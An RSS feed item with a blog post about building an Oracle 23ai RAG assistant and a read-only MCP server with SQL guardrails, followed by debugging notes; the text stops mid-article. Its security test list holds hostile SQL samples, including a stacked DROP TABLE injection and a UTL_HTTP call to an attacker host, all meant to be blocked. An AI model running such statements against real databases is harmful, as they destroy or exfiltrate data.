<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Ranjith Kumar Kondoju</title>
    <description>The latest articles on DEV Community by Ranjith Kumar Kondoju (@rkondoju).</description>
    <link>https://dev.to/rkondoju</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3858156%2F4094f11e-b44c-4e4f-8ac3-3e6c95def0ee.jpg</url>
      <title>DEV Community: Ranjith Kumar Kondoju</title>
      <link>https://dev.to/rkondoju</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/rkondoju"/>
    <language>en</language>
    <item>
      <title>An Oracle DBA builds AI: shipping Oracle 23ai RAG and an MCP server in a weekend</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Wed, 13 May 2026 22:07:38 +0000</pubDate>
      <link>https://dev.to/rkondoju/an-oracle-dba-builds-ai-shipping-oracle-23ai-rag-and-an-mcp-server-in-a-weekend-h3i</link>
      <guid>https://dev.to/rkondoju/an-oracle-dba-builds-ai-shipping-oracle-23ai-rag-and-an-mcp-server-in-a-weekend-h3i</guid>
      <description>&lt;p&gt;I asked Claude to 'DROP TABLE' on my Oracle database.&lt;/p&gt;

&lt;p&gt;It tried. The guardrails refused. The audit log captured it.&lt;/p&gt;

&lt;p&gt;That's the demo screenshot at the top of &lt;a href="https://github.com/shopsmartai/mcp-oracle-dba" rel="noopener noreferrer"&gt;&lt;code&gt;mcp-oracle-dba&lt;/code&gt;&lt;/a&gt;, one of two open-source repos I shipped this weekend as an Oracle Apps DBA learning AI infrastructure. The other is &lt;a href="https://github.com/shopsmartai/oracle-ebs-rag" rel="noopener noreferrer"&gt;&lt;code&gt;oracle-ebs-rag&lt;/code&gt;&lt;/a&gt; — a retrieval-augmented chat assistant over Oracle E-Business Suite resolution notes, running on Oracle Database 23ai's native vector search.&lt;/p&gt;

&lt;p&gt;Both repos are MIT-licensed. Datasets are fully synthetic.&lt;/p&gt;

&lt;p&gt;This post is about what I learned. Not the tutorial-level "here's how to call an embedding API" stuff — the actual production-shaped lessons that took an hour of head-scratching each. If you're an Oracle DBA watching AI from the sidelines, my hope is this post saves you those hours.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why an Oracle DBA, of all people
&lt;/h2&gt;

&lt;p&gt;The 2026 narrative is "AI is replacing DBAs." Look at any tech-jobs Twitter thread and you'll find it.&lt;/p&gt;

&lt;p&gt;The reality I've found is closer to &lt;strong&gt;"DBAs who can ship AI infrastructure replace DBAs who can't."&lt;/strong&gt; Production AI is mostly infrastructure: connection pooling, statement timeouts, audit logs, schema allowlists, PII redaction, prompt caching, cost monitoring. Every one of those is something DBAs already think about daily. It's &lt;em&gt;not&lt;/em&gt; ML research.&lt;/p&gt;

&lt;p&gt;I'm an Oracle Apps DBA. Day job is running production Oracle E-Business Suite R12.2 — upgrades, cloning, patching, &lt;code&gt;adop&lt;/code&gt; troubleshooting, performance tuning, plus database administration on Oracle 19c. Ansible for automation. OCI for cloud. Standard stack.&lt;/p&gt;

&lt;p&gt;What surprised me about building AI infrastructure: my Oracle skills transferred more cleanly than I expected. The new piece is &lt;em&gt;small&lt;/em&gt; compared to the production-engineering scaffolding around it.&lt;/p&gt;

&lt;p&gt;Here's the proof, then the lessons.&lt;/p&gt;




&lt;h2&gt;
  
  
  What I built
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Talk to EBS — RAG over Oracle E-Business Suite
&lt;/h3&gt;

&lt;p&gt;A chat interface where I ask plain-English questions about EBS production scenarios and the system responds with grounded answers and inline citations to the source notes.&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/HDMUIlwQl-I"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;The stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Oracle Database 23ai Free&lt;/strong&gt; in Docker (via OrbStack on Apple Silicon). Native &lt;code&gt;VECTOR(1024, FLOAT32)&lt;/code&gt; datatype, &lt;code&gt;VECTOR_DISTANCE&lt;/code&gt; function with cosine similarity. &lt;strong&gt;No external vector database. No Pinecone, no Weaviate, no Milvus.&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cohere &lt;code&gt;embed-english-v3.0&lt;/code&gt;&lt;/strong&gt; for embeddings (1024 dimensions, free tier is generous).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet&lt;/strong&gt; with prompt caching for grounded generation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Streamlit&lt;/strong&gt; chat UI with streaming responses, citations panel, and a sidebar that tracks live cost and prompt-cache hit rate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;uv&lt;/code&gt;&lt;/strong&gt; for Python project management.&lt;/li&gt;
&lt;/ul&gt;
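&lt;p&gt;To make "no external vector database" concrete, here's roughly what the retrieval query looks like on 23ai. This is an illustrative sketch — &lt;code&gt;rag_chunks&lt;/code&gt;, &lt;code&gt;embedding&lt;/code&gt;, and the column names are stand-ins, not necessarily the repo's actual schema:&lt;/p&gt;

```python
# Illustrative sketch of the core retrieval query against Oracle 23ai's
# native vector search. Table and column names (rag_chunks, embedding,
# chunk_text) are stand-ins, not the repo's actual schema.
def build_retrieval_sql(top_k=6):
    """Return a SELECT that ranks chunks by cosine distance to a bind vector."""
    return f"""
        SELECT chunk_id, chunk_text,
               VECTOR_DISTANCE(embedding, :query_vec, COSINE) AS dist
        FROM rag_chunks
        ORDER BY dist
        FETCH FIRST {int(top_k)} ROWS ONLY
    """
```

&lt;p&gt;With &lt;code&gt;python-oracledb&lt;/code&gt; the &lt;code&gt;:query_vec&lt;/code&gt; bind would carry the 1024-float query embedding; execution is omitted here because it needs a live 23ai instance.&lt;/p&gt;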

&lt;p&gt;The dataset is 3 synthetic resolution notes covering concurrent-manager troubleshooting, workflow mailer issues, and &lt;code&gt;adop&lt;/code&gt; patching failures. Each note has YAML frontmatter and is split on Markdown H2 headings (Symptom / Diagnosis / Root cause / Resolution) into 5–6 chunks. That's about 17 chunks total in the vector store.&lt;/p&gt;
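&lt;p&gt;The chunking step is simple enough to sketch in a few lines. This is an illustrative reimplementation, not the repo's code: strip the YAML frontmatter, then split the body on H2 headings so each Symptom / Diagnosis / Resolution section becomes its own chunk:&lt;/p&gt;

```python
# Illustrative chunker: drop YAML frontmatter, split on Markdown H2
# headings, keep each heading with its section text.
import re

def chunk_note(text):
    # Drop frontmatter delimited by leading '---' lines.
    m = re.match(r"^---\n.*?\n---\n", text, flags=re.DOTALL)
    body = text[m.end():] if m else text
    chunks = []
    # Split on H2 headings, keeping the heading attached to its section.
    for part in re.split(r"(?m)^(?=## )", body):
        part = part.strip()
        if not part:
            continue
        if part.startswith("## "):
            heading = part.splitlines()[0].lstrip("# ").strip()
        else:
            heading = "intro"
        chunks.append({"section": heading, "text": part})
    return chunks
```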

&lt;p&gt;Eval harness with Claude Haiku as judge over a 10-question golden set. Current baseline:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Retrieval recall @ 6&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100 %&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Must-contain pass&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100 %&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Must-not-contain pass&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100 %&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Claude Haiku judge avg&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;4.80 / 5&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CI regression gate in &lt;code&gt;.github/workflows/eval.yml&lt;/code&gt; fails the build on &amp;gt;5 percentage-point drop on any metric. Zero tolerance on &lt;code&gt;must_not_contain&lt;/code&gt; (forbidden-claim violations).&lt;/p&gt;
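&lt;p&gt;The comparison behind that gate fits in a dozen lines. A sketch — metric names and the baseline format are illustrative, not the workflow's actual schema:&lt;/p&gt;

```python
# Illustrative regression gate: fail on any metric dropping more than
# 5 percentage points versus the stored baseline, zero tolerance on
# must_not_contain. Metric names are stand-ins.
def gate(baseline, current, max_drop_pct=5.0):
    failures = []
    for metric, base_val in baseline.items():
        cur_val = current.get(metric, 0.0)
        if metric == "must_not_contain_pass" and cur_val != 100.0:
            failures.append(f"{metric}: forbidden-claim violation ({cur_val})")
        elif base_val - cur_val > max_drop_pct:
            failures.append(f"{metric}: dropped {base_val - cur_val:.1f} points")
    return failures
```

&lt;p&gt;CI then exits nonzero if the returned list is non-empty.&lt;/p&gt;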

&lt;h3&gt;
  
  
  mcp-oracle-dba — A Model Context Protocol server for Oracle
&lt;/h3&gt;

&lt;p&gt;This one is the more unusual project. MCP is a protocol Anthropic released that lets any compatible client (Claude Desktop, Claude Code, Cursor) plug in tools written in any language. Most "let your LLM query the database" demos hand the LLM a connection string and trust it not to call &lt;code&gt;DROP TABLE&lt;/code&gt;. This server flips that.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcom0xqvh736ddhd34xxy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcom0xqvh736ddhd34xxy.png" alt="mcp-oracle-dba demo" width="800" height="744"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Above: real conversation through Claude Desktop. Claude runs &lt;code&gt;list_schemas&lt;/code&gt;, &lt;code&gt;describe_table&lt;/code&gt;, &lt;code&gt;run_select&lt;/code&gt; against my Oracle 23ai — then is refused when it tries to &lt;code&gt;DROP TABLE&lt;/code&gt;. The rejection lands in &lt;code&gt;audit.log&lt;/code&gt; as a JSON line.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Five tools exposed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;list_schemas       → returns the allowlist of schemas the server can query
describe_table     → column metadata for SCHEMA.TABLE
run_select         → executes a SELECT / WITH, row-capped, PII-redacted
explain_plan       → returns DBMS_XPLAN.DISPLAY output
top_sql            → top SQL by elapsed time from v$sql in the last N min
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Five independent guardrail layers reject unsafe input before it reaches Oracle:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Single-statement parser&lt;/strong&gt; — rejects &lt;code&gt;... ; DROP TABLE x&lt;/code&gt; injection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;First-keyword allowlist&lt;/strong&gt; — only &lt;code&gt;SELECT&lt;/code&gt; and &lt;code&gt;WITH&lt;/code&gt; accepted.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Banned-keyword scan&lt;/strong&gt; — DML, DDL, PL/SQL blocks, transaction control blocked anywhere in the statement.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dangerous-package regex&lt;/strong&gt; — blocks &lt;code&gt;DBMS_*&lt;/code&gt;, &lt;code&gt;UTL_*&lt;/code&gt;, &lt;code&gt;SYS.*&lt;/code&gt; calls (think &lt;code&gt;DBMS_LOCK.sleep&lt;/code&gt;, &lt;code&gt;UTL_HTTP.request&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hard row cap&lt;/strong&gt; — every approved query gets wrapped in &lt;code&gt;SELECT * FROM (...) FETCH FIRST :N ROWS ONLY&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;
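&lt;p&gt;A condensed, stdlib-only sketch of those five layers in order. The real server leans on &lt;code&gt;sqlparse&lt;/code&gt;; this version is illustrative and just shows the shape:&lt;/p&gt;

```python
# Illustrative sketch of the five guardrail layers; not the repo's code.
import re

class SqlGuardError(Exception):
    pass

# Layer 3: DML/DDL/PL-SQL/transaction-control keywords banned anywhere.
BANNED = {"INSERT", "UPDATE", "DELETE", "MERGE", "DROP", "ALTER", "CREATE",
          "TRUNCATE", "GRANT", "REVOKE", "BEGIN", "DECLARE", "COMMIT", "ROLLBACK"}
# Layer 4: dangerous package prefixes.
PKG_RE = re.compile(r"\b(DBMS_|UTL_|SYS\.)", re.IGNORECASE)

def validate_select(sql, row_cap=100):
    stmt = sql.strip().rstrip(";")
    if ";" in stmt:  # layer 1: single statement only
        raise SqlGuardError("multiple statements")
    words = re.findall(r"[A-Za-z_$.]+", stmt.upper())
    if not words or words[0] not in {"SELECT", "WITH"}:  # layer 2: first keyword
        raise SqlGuardError("only SELECT and WITH allowed")
    if BANNED.intersection(words):  # layer 3: banned keywords
        raise SqlGuardError("banned keyword")
    if PKG_RE.search(stmt):  # layer 4: dangerous packages
        raise SqlGuardError("dangerous package call")
    # Layer 5: hard row cap wrap.
    return f"SELECT * FROM ({stmt}) FETCH FIRST {int(row_cap)} ROWS ONLY"
```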

&lt;p&gt;Plus a read-only DB user, schema allowlist for introspection, PII column redaction by name substring (&lt;code&gt;SSN&lt;/code&gt;, &lt;code&gt;SALARY&lt;/code&gt;, &lt;code&gt;PASSWORD&lt;/code&gt;…), JSON audit log of every call, and server-side statement timeout via &lt;code&gt;oracledb&lt;/code&gt;'s &lt;code&gt;call_timeout&lt;/code&gt;.&lt;/p&gt;
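&lt;p&gt;The PII redaction is deliberately blunt: substring match on column names, mask the whole column before rows leave the server. A sketch using only the substrings named above (the repo's list has more entries):&lt;/p&gt;

```python
# Illustrative column-name-substring redaction; the real substring list
# is longer and configurable.
PII_SUBSTRINGS = ("SSN", "SALARY", "PASSWORD")

def redact_rows(columns, rows):
    # Decide once per column whether it gets masked.
    hide = [any(s in col.upper() for s in PII_SUBSTRINGS) for col in columns]
    return [tuple("***REDACTED***" if h else v for v, h in zip(row, hide))
            for row in rows]
```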

&lt;p&gt;There are 45 security tests in &lt;code&gt;tests/test_guardrails.py&lt;/code&gt;. Every test maps to a real attack vector. Sample:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nd"&gt;@pytest.mark.parametrize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sql&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT 1 FROM dual; DROP TABLE fnd_user&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;BEGIN dbms_lock.sleep(60); END;&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT dbms_random.value FROM dual&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT utl_http.request(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;http://attacker.com&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;) FROM dual&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;MERGE INTO target USING source ON (...) WHEN MATCHED THEN UPDATE...&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;])&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_blocks_dangerous_sql&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sql&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;pytest&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;raises&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SqlGuardError&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="nf"&gt;validate_select&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sql&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When I wired the MCP server up to Claude Desktop and asked Claude to drop a table, this is what the audit log captured:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"ts"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"2026-05-13T01:07:39Z"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"tool"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"run_select"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
 &lt;/span&gt;&lt;span class="nl"&gt;"sql"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"DROP TABLE ragapp.rag_documents"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
 &lt;/span&gt;&lt;span class="nl"&gt;"rejected"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Only SELECT and WITH allowed; got: DROP"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
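&lt;p&gt;The audit logger behind that line is nothing exotic — append-only JSON lines, one object per tool call, written whether the call was approved or rejected. A sketch; field names follow the excerpt above, everything else is illustrative:&lt;/p&gt;

```python
# Illustrative JSON-lines audit logger; field names match the log excerpt
# above, the rest is a stand-in for the repo's implementation.
import datetime
import json

def audit(path, tool, sql, rejected=None):
    entry = {
        "ts": datetime.datetime.now(datetime.timezone.utc)
                                .strftime("%Y-%m-%dT%H:%M:%SZ"),
        "tool": tool,
        "sql": sql,
    }
    if rejected:
        entry["rejected"] = rejected
    line = json.dumps(entry)
    with open(path, "a") as f:  # append-only, one JSON object per line
        f.write(line + "\n")
    return line
```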



&lt;p&gt;Claude got back a clean error message and reported to me that the operation was refused. No SQL ever reached Oracle.&lt;/p&gt;




&lt;h2&gt;
  
  
  The five bugs that taught me the most
&lt;/h2&gt;

&lt;p&gt;Here's the meat. Each of these cost me about an hour. If you build something similar, you'll likely hit at least two of them.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. OrbStack's macOS port-forward NAT silently mangles Oracle TNS handshakes
&lt;/h3&gt;

&lt;p&gt;Symptom: &lt;code&gt;python-oracledb&lt;/code&gt; thin-mode connection from my Mac to the Oracle container fails immediately with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;oracledb.exceptions.DatabaseError: DPY-4011: the database or
network closed the connection
[Errno 54] Connection reset by peer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The listener's text trace log shows nothing — only successful &lt;code&gt;sqlplus&lt;/code&gt; connections from inside the container. After half an hour of trying &lt;code&gt;127.0.0.1&lt;/code&gt; versus &lt;code&gt;localhost&lt;/code&gt;, disabling out-of-band (OOB) breaks, rewriting the TNS descriptor, and force-registering the service, the smoking gun finally surfaced in the &lt;em&gt;XML&lt;/em&gt; listener alert log (a different file from the text trace log):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;* (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.215.0)(PORT=63905))
* &amp;lt;unknown connect data&amp;gt; * 12537
TNS-12537: TNS:connection closed
TNS-12560: Database communication protocol error
TNS-00507: Connection closed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;&amp;lt;unknown connect data&amp;gt;&lt;/code&gt; — the listener received the connect packet but couldn't parse it. The source IP was OrbStack's NAT gateway (&lt;code&gt;.215.0&lt;/code&gt;), not my host or the container.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; don't go through &lt;code&gt;127.0.0.1&lt;/code&gt; at all. OrbStack on macOS gives each container an &lt;code&gt;&amp;lt;container-name&amp;gt;.orb.local&lt;/code&gt; hostname that routes natively without NAT. So:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Before — fails
&lt;/span&gt;&lt;span class="n"&gt;DSN&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;127.0.0.1:1521/FREEPDB1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="c1"&gt;# After — works
&lt;/span&gt;&lt;span class="n"&gt;DSN&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;oracle23ai.orb.local:1521/FREEPDB1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same Oracle, same Python, same code path. Different DNS path. Connection succeeds.&lt;/p&gt;

&lt;p&gt;This is documented exactly zero places I could find. Filed it under "things you only learn by hitting them."&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Sandboxed macOS apps can't resolve &lt;code&gt;*.orb.local&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;This bit me a second time, an hour later. After getting my terminal scripts to work with &lt;code&gt;oracle23ai.orb.local&lt;/code&gt;, I wired the MCP server into Claude Desktop and watched &lt;code&gt;list_schemas&lt;/code&gt; succeed but &lt;code&gt;run_select&lt;/code&gt; fail with a &lt;code&gt;No route to host&lt;/code&gt; error.&lt;/p&gt;

&lt;p&gt;Why? Claude Desktop is a sandboxed macOS app. When it spawns the MCP server as a child process, that child process inherits the sandbox — and the sandbox doesn't have access to OrbStack's DNS resolver. So &lt;code&gt;oracle23ai.orb.local&lt;/code&gt; doesn't resolve.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; use the container's direct IP, which routes through normal kernel networking:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;CONTAINER_IP&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;docker inspect oracle23ai &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--format&lt;/span&gt; &lt;span class="s1"&gt;'{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="c"&gt;# Then: ORA_DSN=$CONTAINER_IP:1521/FREEPDB1&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The IP can change on container recreate, but it's stable across restarts. For a dev tool, that's a fair trade.&lt;/p&gt;

&lt;p&gt;This one is now in the README's troubleshooting section. I expect every Mac user who wires up an MCP server with a Dockerised Oracle to hit this.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. &lt;code&gt;SELECT_CATALOG_ROLE&lt;/code&gt; replaces three explicit V$ grants
&lt;/h3&gt;

&lt;p&gt;My first cut of the read-only user setup had this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;USER&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt; &lt;span class="n"&gt;IDENTIFIED&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="nv"&gt;"..."&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;SESSION&lt;/span&gt; &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;v_&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="k"&gt;sql&lt;/span&gt;       &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;-- fails&lt;/span&gt;
&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;v_&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="k"&gt;session&lt;/span&gt;   &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;-- fails&lt;/span&gt;
&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;v_&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;pdbs&lt;/span&gt;      &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;-- fails&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three &lt;code&gt;ORA-00942: table or view does not exist&lt;/code&gt; errors. The &lt;code&gt;V_$&lt;/code&gt; views are owned by &lt;code&gt;SYS&lt;/code&gt;. &lt;code&gt;SYSTEM&lt;/code&gt; has the DBA role and can read them, but to &lt;em&gt;grant&lt;/em&gt; them onward you need to be &lt;code&gt;SYS&lt;/code&gt; or have explicit &lt;code&gt;WITH GRANT OPTION&lt;/code&gt;. Neither is true by default.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="n"&gt;SELECT_CATALOG_ROLE&lt;/span&gt; &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That one role covers every &lt;code&gt;V$&lt;/code&gt; and &lt;code&gt;DBA_*&lt;/code&gt; view in the dictionary, in one line. It's the right answer for any service that needs to introspect Oracle. No &lt;code&gt;SYS&lt;/code&gt;-grantor problem.&lt;/p&gt;

